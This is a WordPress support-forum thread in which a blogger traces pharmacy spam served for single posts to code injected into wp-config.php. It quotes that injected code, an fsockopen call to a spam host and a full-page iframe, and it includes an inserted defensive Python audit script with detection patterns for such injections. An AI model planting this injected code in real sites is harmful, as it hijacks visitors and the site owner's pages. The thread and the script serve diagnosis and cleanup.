[resolved] is this some new spam attack? (36 posts)

  1. nothingHappens
    Posted 8 years ago #

    I've been looking through the forums, googling my butt off, and can't find anything that describes what I'm experiencing. And I need help getting rid of it.

    A while back one of my posts got compromised with spam -- not in the form of a comment, or the post itself being edited, but rather this: the posts showed up normally on the home page, but when you click a post title to go to the individual post (say, to leave a comment) you get a spam page. Not a bunch of spam links inserted into the post/page content, mind you, but a completely different web page hawking cheap drugs. However the URL is still the same URL as normal to view the post. This doesn't start happening right away after publishing the post, but some time a little later.

    The first time it happened, I figured it for a one-off deal, and promptly deleted the post and just copied its contents into a new post. But yesterday it happened again, so I thought I'd better take new measures.

    First, I was long overdue for an upgrade anyway (was still using WordPress 2.0) so I installed the automatic upgrade plugin and upgraded to the latest. Then I changed my user password and ssh/ftp password at my web host. Then I posted to the blog saying, in effect, "sorry about the spam thing, but I went ahead and did this and this and hopefully it won't happen again."

    This morning I find out it happened again -- to that very post:

    http://nothinghappens.net -- the home page, post looks normal
    http://nothinghappens.net/?p=316 -- holy crap wtf

    Here are some more interesting details I've dug up: If you add a trailing / to the URL you get the post again instead of the spam site. Check it out: http://nothinghappens.net/?p=316/ However, before you tell me to check my .htaccess -- I don't have one. Also, I looked at the post's record in the database via phpMyAdmin and nothing's been done to it there.

  2. RosieMBanks
    Posted 8 years ago #

    Read these:

    Security Issue, Multiple Sites

    (Scroll down to Ultrasonic's post -- he'll tell you how to check for a ghost user that may have been added to your database.)

    Has Your WordPress Been Hacked Recently?

    Weird and Dangerous : ro8kfbsmag.txt

    As far as I understand, this kind of attack is the result of running an old version of WordPress. It will also get you delisted from Google.

    And goodness, I think you win the prize for running the oldest version of WP that I've seen so far:

    <meta name="generator" content="WordPress 1.2" /> <!-- leave this for stats -->

  3. nothingHappens
    Posted 8 years ago #

    That meta tag must be incorrect, I was using WordPress 2.0 until last night when I upgraded to 2.5.1 -- as I just said in my original post. If you won't bother reading it, I can't imagine your input will be much help, since you're probably giving me stock info without bothering to look at the specifics of my issue as explained... but I'll check out those links anyway.

  4. nothingHappens
    Posted 8 years ago #

    RosieMBanks, that meta tag was hard-coded into the theme I'm using; I've changed it now to use the $wp_version variable.

    For the rest of you, please read carefully before "helping" thanks.

  5. Joni
    Posted 8 years ago #

    Well since the attack happened prior to the upgrade, the rogue user info was already in the database. One big fat reason to upgrade. And .. although it's too late now, I should mention for the benefit of any other readers on a very old (pre 2.0) version of WP, you CAN upgrade to 2.0.11, which is the only other supported, secure version of WP out there. :)

    But for you, Chuck, I guess you should dive into those database tables and locate and kill that other user. Provided he/she doesn't show up on your User panel in the dashboard. Good luck. And beware the Grues. ;)

  6. nothingHappens
    Posted 8 years ago #

    I've looked at the database in phpMyAdmin, there is only the one user (admin) in it, and I changed its password immediately after upgrading to 2.5.1 last night. Also mentioned in my original post. Thanks, though.

  7. Ivovic
    Posted 8 years ago #

    You seem hell bent on people dutifully taking in the details of your post.

    Being as studious as you are, you must absolutely be kicking yourself at your own laziness and arrogance which allowed you the delusion that somehow security updates weren't necessary for you.

    God that must really hurt right now.

    (by the way, I read about that in your original post)

    I'm not sure what you'd have us do for you now, though. If you happen to invent a time machine let us know. I'll be sure to read that post in intimate detail.

    In the mean time, unless you're busy wiping *everything* from your hosting space and reloading fresh copies of (again) *everything* including wordpress, themes and plugins, may I suggest you start there?

    Leave no file behind... but do backup any media contained in your posts.

  8. Rove
    Posted 8 years ago #

    Also, your page that looks normal also contains lots of hidden links in both the header and footer. Although you have upgraded now to the most recent version, there are still one or more files that are hacked.

    Best advice is what Ivovic gave you: delete everything and reinstall everything from a clean source.

  9. nothingHappens
    Posted 8 years ago #

    Well you know, every thing I've read that contains suggestions about proper etiquette for posting to a support forum says to be specific and include details. So it's frustrating when I take pains to do so, and people ignore them. If you're not going to pay any attention to the information I'm providing to help diagnose the issue, don't waste both of our time. And ffs don't waste your own time replying just to try to bitch me out. Go do something productive.

    As I've pointed out, I made a long-overdue upgrade from 2.0 (NOT 1.2, that meta tag was hard-coded into a theme file and hence erroneous) to 2.5.1 last night. Until then, the labor involved in doing an upgrade was the main thing keeping me from doing it sooner, until I found the automatic upgrade plugin -- kudos to the fine folks who came up with that! As you probably know, the upgrade overwrites pretty much every WordPress file with the new versions, so it's not far off from a complete reinstall. Images, media, and themes obviously are left alone.

    Immediately after doing the upgrade, I changed my user account password in WordPress and also my FTP/SSH password. But I repeat myself yet again. Shortly after doing this, the same spam-attack was made yet again.

    Yeah, if I had lots of time on my hands, I could wipe every single file as you suggest, but I thought maybe someone here would be able to help me narrow things down a bit so I could maybe focus on certain files and approach this in an efficient manner rather than a hack-and-slash one.

    Anyway I'm going to go have a look at the files in my theme.

  10. Ivovic
    Posted 8 years ago #

    And ffs don't waste your own time replying just to try to bitch me out.

    Well actually, I did offer you the only course of action likely to lead to a solution.

    Yeah, if I had lots of time on my hands, I could wipe every single file as you suggest, but I thought maybe someone here would be able to help me narrow things down a bit so I could maybe focus on certain files and approach this in an efficient...

    It's far more time-efficient and effective to stamp out your problem, than it is to waffle around and squawk about alternatives which do not exist.

    Immediately after doing the upgrade, I changed my user account password in WordPress and also my FTP/SSH password. But I repeat myself yet again. Shortly after doing this, the same spam-attack was made yet again.

    let me see if I can be ultra-specific for you, since now you're the one having trouble reading what's been written for you..

    you didn't get rid of the back door they left for themselves, therefore they were able to enter at their leisure

    If you don't get rid of EVERYTHING in your hosting space, how will you know that they haven't simply added some code to any of the php files you have uploaded there?

    Do you want to read them all? I sure as feh don't.

    rather than a hack-and-slash one

    I told you to nuke it from orbit... you're the one hell bent on hacking and slashing and ignoring the only effective advice you're going to get.

    Want help? there it is (again)... don't like it? not what you want to hear?... well, I can't tell you how deeply upset that's going to make me.

  11. Joni
    Posted 8 years ago #

    Yep, this has gone beyond just "Oops, I really should get off my duff and upgrade so I don't get hacked." It's too late for that now. Now you go into damage control and, unfortunately, that means that all the files on your server are suspect. But if you keep backups of your things on your hard drive (you do, don't you?), it's not that big a deal to just restore fresh files either from a known good back up (your server log files should give clues as to when the breach occurred) or from uncompromised files residing on your hard drive.

    A PITA, you bet. Upgrading on a regular basis seems like a walk in the park compared to that now, huh? Nothing learned like something learned the hard way. The end result, tho, should be that you'll have a solid WP install. But as I've said many times over on this forum and elsewhere, you are only as secure as the most lazy, security-lax person sharing your server space. So plan around those idiots by keeping your software updated regularly.

    "If you don't have enough time to do it right, when are you going to have time to do it over?"

  12. nothingHappens
    Posted 8 years ago #

    Here's the thing: I'm not entirely convinced that this particular attack involves changing any of WordPress's PHP files directly. The weird behavior described where the post shows up normally if you add a trailing / to the URL seems to suggest there's something else at work here, as does this: the spam page is still given by URLs that point to posts that I have deleted; also the upgrade I did last night should have replaced all WordPress's own code with new files anyway... at least, the automatic upgrade plugin claimed it was doing so.

    If a specific PHP file has been modified however, a bit of exploration might turn up which specific file(s). Thus my main purpose in posting here was in hopes that someone has seen this specific problem before, and had found the PHP file, or whatever else (database record, .htaccess, theme files, etc.) that had been changed and could point me to it.

    Wiping out and reinstalling Every. Single. File. will take a considerable amount of time, so I was hoping to leave it as a last resort, and start by seeing if I could find anyone that could narrow things down.

    See I program for a living. I don't rewrite my entire code base from scratch every time there's a bug. I'd never make a living that way. I try to find exactly where the bug is first. So this is just my natural approach to a problem like this.

    If you haven't seen this specific problem before and thus can't help narrow things down, then geez, just say so already. At least read enough of my description of said problem to understand what specific problem I'm having rather than just assuming it's a common one that you have a stock answer for -- in which case Google would have turned up information about already and I wouldn't be bothering to post here in the first place.

    I've deleted the spam links that had got hacked into my header and footer files, that I hadn't noticed before but were pointed out by someone actually helpful. That hasn't done away with this particular problem however.

  13. Joni
    Posted 8 years ago #

    Your problem is that you've been hacked. Unless you know how to interpret server logs, and apparently, since you program for a living, you must, the safest thing to do, to prevent further such attacks, is to upload clean files. You don't take a bath and put dirty underwear on, do you? (Sorry, Whoo, I had to!)

  14. Ivovic
    Posted 8 years ago #

    Here's the thing: I'm not entirely convinced that this particular attack involves changing any of WordPress's PHP files directly

    I stopped reading here... he was right, I've got better things to do.

  15. nothingHappens
    Posted 8 years ago #

    Yes, you do. Please go away.
    I'm going to go look at some logs.

  16. Joni
    Posted 8 years ago #

    Whoo is gonna be so disappointed...

  17. Ivovic
    Posted 8 years ago #

    hey NH... please be big enough to come back here when you finally decide to rm -rf the whole lot. I just want to know how long it takes for an otherwise intelligent person to actually take the advice they came here asking for.

    (oh and be sure to look for perl files too, a popular choice of drop-in back doors)

    Don't say I didn't help.

  18. moshu
    Posted 8 years ago #

    YOU should read carefully all the resources offered.
    You were hacked before the upgrade, and in many cases the upgrade itself will NOT clean up the site; e.g. one of the threads referenced by Rosie mentions that the "bad files" are in the wp-content/uploads/200x/34/ and similar folders, and we all know there is no month "34" or "2" (should be 02), so watch out for those and everything else that others already figured out.

    I repeat, too: the upgrade (especially an automated one) does NOT help in itself: during an upgrade the wp-content folder is never touched... so, plenty of unchanged things could be there in different files and subfolders. I can testify that while helping a WP user in a similar situation, when he gave me access to his server, I found ALL the bad files (bad guys? :) in the wp-content folder.

    And if you took the time to read all those threads that were suggested to you by RosieBanks at the beginning - you could have saved a lot of time and bandwidth. Post less and read more.

    Good luck!

  19. nothingHappens
    Posted 8 years ago #

    I don't have a wp-content/uploads/ folder. But thanks for pointing that out, I'll have another look around wp-content. So far I've already examined the themes directory pretty closely.

    And I did read those threads, but they seemed largely to do with rather different issues than this one -- this isn't comment spam, it's displaying an entirely different page in place of the post's page.

  20. Rove
    Posted 8 years ago #

    When I look at the source of the ?p=316 page I see two interesting lines:

    <style>BODY {overflow:hidden; margin:0px;padding:0px;}</style>
    <iframe border=0 width="100%" height="100%" src="http://km23548.keymachine.de/sutra/in.cgi?default&group=farma&parameter=celebrex+delisted+in+alberta"></iframe>

    Other thing you can try is to temporarily switch to the classic theme and see if the problem is still there.

    Edit: after I wrote this I checked your page again and everything seems ok now? Did you find something?

  21. nothingHappens
    Posted 8 years ago #


    One of my readers pointed this out:

    So, I've had a couple of minutes for this, so didn't look too deeply, but there's an iframe in that HTML with the guilty party's URL in it. Googling on that turned up some links, among them this one, which might be a good place to start.

    The URL in question was something at keymachine.de -- so I figured if something has been modified, it's being modified to serve up content from keymachine.de, so the text "keymachine" is likely to be part of the inserted code. So:

    [boo]$ grep -R keymachine .
    ./wp-config.php: $sock = @fsockopen('km20725.keymachine.de', 80);
    ./wp-config.php: fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
    ./wp-config.php: fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");

    There's our spammer. It didn't occur to me previously that among the files the upgrade would leave alone would be wp-config.php, but that does make sense, doesn't it? Not sure how or when wp-config.php would have been compromised, could have been while moving the site from a different host (various files had their permissions temporarily changed at certain times)... but there it was. A couple minutes in vim deleting the offending slab of code and things are back to normal.

    So no, Mr. Cool-Sunglasses-Guy, I still say you didn't help. But thanks for playing.

    Now this post can sit here to be found by others in the future who find themselves with the same issue, and will save THEM hours of re-installing every single file instead of just editing one. Yay! My good deed for the day.

    This is why I'm hot. You ain't cause you not. :D

  22. Ivovic
    Posted 8 years ago #

    wow, that last line really makes me want to be your friend so much right now.

    now we wait and see how long until you get hit again.

    for the record, it's been over an hour since I first posted in this thread, and more than 3 since rosie posted.

    fresh files would have solved this for you before I even got here... happy-dance yourself into a coma if you like, but it seems you really *do* have all this spare time after all.

    See you again soon.

    Like I said, let us know when you actually do rm -rf the lot.

  23. nothingHappens
    Posted 8 years ago #

    3 hours I spent so someone else won't have to then, I guess. Three hours that were also spent tightening up my file permissions and various other helpful things to try to ward off future problems. And for the record, I don't think I ever claimed to want you as a friend.

  24. Joni
    Posted 8 years ago #

    Great news that you solved it. I'd add some keywords to this thread and mark it resolved to help others in the same bind.

  25. Ivovic
    Posted 8 years ago #

    NH I'm sorry the thought of this is so horrible for you, but there's just no way to be certain that you've cleared it up until you wipe the lot.

    Anyone reading this should consider this solution as effective as pain killers applied to a bullet wound. You may feel fine right now, but the real problem is probably still there.

    All you've done is make it less noticeable.

    I can't believe how resistant you are to this. Take a moment and ask yourself "if I were hacking something and could write to files, would I stop at changing just one really easily noticeable one?"

    (probably best if people don't find this and instead jump straight to a solution that doesn't rely on crossing fingers and hoping for the best - clearing out a wordpress install and reloading fresh plugins takes less than 20 minutes).

  26. nothingHappens
    Posted 8 years ago #

    Good idea. Feel free to suggest more helpful tags/keywords than I have chosen -- I added "redirect" since some folks could conceivably mistake it for something that redirects to a different site, and "post" since it "replaces" the page for viewing an individual post, but those seem awfully general...

    Ivovic: the less easily noticeable files would largely have been replaced in the upgrade. If I doubt this, I can check their timestamps. The files it leaves alone are fairly easy to deduce. I think maybe it's just that rm -rf is the only linux command you know. :D

  27. Ivovic
    Posted 8 years ago #

    you could try being less of a fscking asshole. clearly I'm still here because I'm concerned that you'll sway the minds of other like-minded lazy spectators, so if nothing else, that earns me your tolerance.

    you can't replace new files in an upgrade, genius... as someone who isn't nearly as selfish with his time as you are, I've been through enough of these things to see all kinds of additional files, modded files, hidden files, and obfuscated files.

    How many of WordPress's files can you name? Done a compare with what's uploaded as compared with what's in the zip? How about your plugins, no foreign files in there?

    How the hell would you know? you haven't even looked.

    and honestly, if you did actually look at all that, then you're more of a moron than I give you credit for, since clearing it out would have been miles faster.

    for the record, it's a unix command, some of us used the command line before it became cool.
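
A defensive script, added here as an example and not taken from this thread or from WordPress itself, that combines the grep in post 21 with the "compare with what's in the zip" check in post 27: hash every file in the install against a clean reference tree, list what differs or is not shipped in the reference at all (wp-config.php and everything under wp-content, which is exactly what an upgrade leaves alone), and scan only those files for the constructs seen in this thread. The file contents, the spam-host.invalid host name and the indicator patterns are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile

# Constructed indicators: wp-config.php fsockopen fetch, hidden theme links, PHP loaders
SUSPICIOUS = re.compile(
    rb"fsockopen\s*\(|base64_decode\s*\(|\beval\s*\(|gzinflate\s*\(|"
    rb"display\s*:\s*none|<iframe\b",
    re.IGNORECASE,
)

def file_hashes(root):
    """Map relative path -> sha256 of every regular file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def scan_file(path):
    """Return (line number, line text) for each line matching SUSPICIOUS."""
    with open(path, "rb") as fh:
        return [(n, ln.strip().decode("latin-1")[:80])
                for n, ln in enumerate(fh, 1) if SUSPICIOUS.search(ln)]

def audit(install, reference):
    """Classify install vs a clean reference: 'modified' (in both, differs),
    'extra' (not shipped: wp-config.php, wp-content), 'suspicious' (hits)."""
    inst, ref = file_hashes(install), file_hashes(reference)
    modified = sorted(p for p in inst if p in ref and inst[p] != ref[p])
    extra = sorted(p for p in inst if p not in ref)
    suspicious = {}
    for rel in modified + extra:  # an upgrade never replaces these, so look here
        hits = scan_file(os.path.join(install, rel))
        if hits:
            suspicious[rel] = hits
    return {"modified": modified, "extra": extra, "suspicious": suspicious}

def write(root, rel, body):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(body)

def run_demo():
    """Audit a constructed hacked install against a constructed clean tree."""
    with tempfile.TemporaryDirectory() as base:
        ref, inst = os.path.join(base, "clean"), os.path.join(base, "site")
        for root in (ref, inst):  # core file and theme header start identical
            write(root, "wp-settings.php", b"<?php // untouched core file\n")
            write(root, "wp-content/themes/classic/header.php", b"<head></head>\n")
        # the three injections this thread describes, in constructed form
        write(inst, "wp-config.php",
              b"<?php\n$sock = @fsockopen('spam-host.invalid', 80);\n")
        write(inst, "wp-content/themes/classic/header.php",
              b'<head></head>\n<div style="display:none">spam</div>\n')
        write(inst, "wp-content/uploads/2008/34/x.php",
              b"<?php eval(base64_decode('AAAA'));\n")
        return audit(inst, ref)

if __name__ == "__main__":
    print(run_demo())
```

Point audit() at a real install and a freshly unpacked copy of the same WordPress release; anything listed under "extra" or "modified" is what the upgrade could not have cleaned, and the pattern hits are where to read first.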

  28. moshu
    Posted 8 years ago #

    Guys, let's stop the personal remarks, and focus on the issue. Otherwise I'll be forced to delete posts and close the thread.
    Play nice...

  29. moshu
    Posted 8 years ago #

    [I told ya I am quick with the delete button!]

  30. nothingHappens
    Posted 8 years ago #

    What does anyone think of the suggestion of setting the permissions of config.php to 640? Has it been suggested before? Would it be helpful? It does contain a database connection password after all. Since my particular issue turned out to involve config.php (the header and footer in my theme were also full of spam links, but I know not whether that was from the same party), that thought occurred to me. I went ahead and chmod'd it as such. Oh, and personal attacks directed /at/ me don't warrant a delete, naturally, so flame away.

Topic Closed

This topic has been closed to new replies.